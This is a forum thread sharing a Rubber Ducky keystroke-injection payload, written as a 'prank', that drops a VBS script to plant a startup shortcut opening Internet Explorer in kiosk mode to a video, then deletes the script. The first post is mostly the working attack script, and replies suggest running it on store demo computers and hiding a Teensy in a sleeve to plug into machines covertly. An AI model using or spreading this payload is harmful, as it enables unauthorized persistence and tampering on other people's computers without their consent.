Jump to content

[Payload] Ugly Rolled Prank


Recommended Posts

This is a prank I programmed on the teensy and just converted to ducky script.

please feel free to change the website to whatever u want. I used to link to hi795.com but it seems to be shut down.

REM YouveBeenUglyRolled By petertfm
REM payload creats a vbs script that is run to make a YouveBeenUglyRolled.lnk to IE in the users start-up folder
REM IE is set to run in kiosk mode "-K" and links to youtube with a very annoying lady gaga with jim carrey's face video
REM note if running in 64 bit windows, you may need to change %programfiles% with %programfiles(x86)% flash player 64 bit may not be installed!
ESCAPE
GUI r
DELAY 120
STRING cmd.exe
ENTER
DELAY 325
STRING copy con YouveBeenUglyRolled.vbs
ENTER
STRING Set WshShell = WScript.CreateObject("WScript.Shell"):
STRING StrMyStartUp = WshShell.SpecialFolders("Startup"):
STRING Set lnk = WshShell.CreateShortcut(StrMyStartUp + "\YouveBeenUglyRolled.lnk"):
ENTER
STRING lnk.TargetPath = "%programfiles%\Internet Explorer\iexplore.exe":
REM place any link here, this one is a very annoying lady gaga with jim carrey's face
REM the -K option makes IE run in kiosk mode
STRING lnk.Arguments = "-K http://www.youtube.com/v/XYYo3T6nCw8?autoplay=1":
REM also try http://www.youtube.com/v/9WZGyzz5O-U?autoplay=1 for katy perry rip, or
REM http://www.youtube.com/v/HqGsT6VM8Vg?autoplay=1 for scary car video
STRING lnk.Save
ENTER
CTRL z
ENTER
STRING YouveBeenUglyRolled.vbs
ENTER
DELAY 200
STRING DEL YouveBeenUglyRolled.vbs
ENTER
STRING EXIT
ENTER

feb 8 2012 updated script with link to youtube to auto play "autoplay=1"

Edited by petertfm
Link to comment
Share on other sites

i do not know of any. usually if you could make a YouTube vid launch in full screen?

usually thats pressing F on the keyboard.....might be just as good?

funny side note, with a video open, holding up and left arrow keys starts a game of "Snake"

I couldn't get the snake game to work.

a fun thing to do is go into a electronics store and try out a computer/laptop, make sure it's got internetz

then roll it and log out.

can just imagine when a customer asks to use that computer:-D

had an idea with a teensy useing a usb cable going from my pocket up my shirt and out my sleeve, then you just palm it and hold your hand on the spot where the usb port is

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...